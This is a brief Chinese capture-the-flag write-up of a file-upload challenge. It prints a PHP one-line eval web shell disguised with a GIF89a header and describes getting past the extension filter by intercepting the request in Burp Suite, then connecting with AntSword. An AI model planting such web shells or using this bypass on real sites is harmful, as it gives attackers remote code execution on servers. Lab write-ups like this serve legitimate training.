先注册一个账号,然后登录。
发现可以上传图片,试试图片码🐎,
GIF89a
<script language='php'> @eval($_POST['hacker']);</script>
将这段代码粘贴到txt,文件另存为1juhua.php.jpg,然后用burpsuit 上传抓包
把名字 1juhua.php.jpg的末尾.jpg去掉上传,得到文件上传地址uploads/d41d8cd98f00b204e9800998ecf8427e.php
显示:
GIF89a
证明一句话图片码上传成功,利用中国蚁剑连接
得到flag